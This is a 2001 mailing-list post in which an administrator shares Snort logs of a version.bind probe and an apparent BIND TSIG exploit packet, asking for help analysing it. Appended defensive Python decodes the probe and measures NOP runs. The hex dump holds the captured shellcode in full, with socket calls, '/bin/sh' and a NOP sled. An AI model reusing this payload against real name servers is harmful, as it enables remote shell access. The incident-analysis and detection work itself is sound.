Security Incidents mailing list archives

Named TSIG exploit?


From: Mihai Moldovanu <mihaim () PROFM RO>
Date: Mon, 5 Feb 2001 20:19:40 +0200

I found this in the SNORT logs:

[**] IDS278 - SCAN -named Version probe [**]
02/01-09:30:18.672782 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x48
141.85.31.233:1024 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0  DF
Len: 38
00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 72  .............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03        sion.bind.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x22A
141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0  DF
Len: 520
00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83  ................
C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80  ..=....|........
00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53  ....SIGNATURE.RS
41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00  A...4^........f.
00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89  .....F..F0.F.1..
46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00  F .F..F$.f......
00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00  ...N............
00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45  .............5.E
03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00  ................
00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73  ..._....../bin/s
68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05  h...7^j.j.j.jf..
61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50  a.......j...P1.P
68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D  h$....F.PRh.....
05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF  ................
FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62  ....5.E......./b
69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90  in/sh...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The shellcode inside the second packet is pretty strange. Can anyone
take a deeper look at it?

Lead programmer,
Mihai Moldovanu (mihaim () profm ro)
WEB:    http://tfm.profm.ro/
        http://www.developers.ro/
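As an added illustration (not part of the original post), the following decodes the first captured UDP payload to confirm it is a version.bind CH TXT query, the pattern behind Snort's IDS278, and implements the NOP-run heuristic that IDS362 relies on. The probe bytes are copied from the IDS278 dump above; the sample NOP payload in the usage is constructed.

```python
import struct

# Copied from the IDS278 dump in the post: the 30-byte UDP payload of the
# probe (Snort's "Len: 38" includes the 8-byte UDP header).
VERSION_PROBE = bytes.fromhex(
    "00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 72 "
    "73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03"
)

QTYPE_TXT = 16      # RFC 1035 TXT record type
QCLASS_CHAOS = 3    # CHAOS class, used by BIND's version.bind pseudo-zone


def parse_dns_question(payload: bytes) -> dict:
    """Decode the header and first question of an RFC 1035 DNS message."""
    if len(payload) < 12:
        raise ValueError("payload shorter than a DNS header")
    msg_id, flags, qdcount, ancount, nscount, arcount = struct.unpack("!6H", payload[:12])
    if qdcount < 1:
        raise ValueError("no question section")
    labels, pos = [], 12
    while True:
        if pos >= len(payload):
            raise ValueError("truncated question name")
        length = payload[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(payload[pos:pos + length].decode("ascii", "replace"))
        pos += length
    if pos + 4 > len(payload):
        raise ValueError("truncated QTYPE/QCLASS")
    qtype, qclass = struct.unpack("!HH", payload[pos:pos + 4])
    return {"id": msg_id, "flags": flags, "qdcount": qdcount, "arcount": arcount,
            "qname": ".".join(labels), "qtype": qtype, "qclass": qclass}


def is_version_bind_probe(payload: bytes) -> bool:
    """True for the version.bind CH TXT query that triggers IDS278."""
    try:
        q = parse_dns_question(payload)
    except ValueError:
        return False
    return (q["qname"].lower() == "version.bind"
            and q["qtype"] == QTYPE_TXT and q["qclass"] == QCLASS_CHAOS)


def longest_nop_run(payload: bytes, nop: int = 0x90) -> int:
    """Length of the longest run of x86 NOP bytes, the heuristic behind IDS362."""
    best = run = 0
    for b in payload:
        run = run + 1 if b == nop else 0
        best = max(best, run)
    return best
```

Running `is_version_bind_probe(VERSION_PROBE)` returns True, and `longest_nop_run` on a constructed payload such as `b"\x90" * 5 + b"\x31" + b"\x90" * 8` returns 8.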

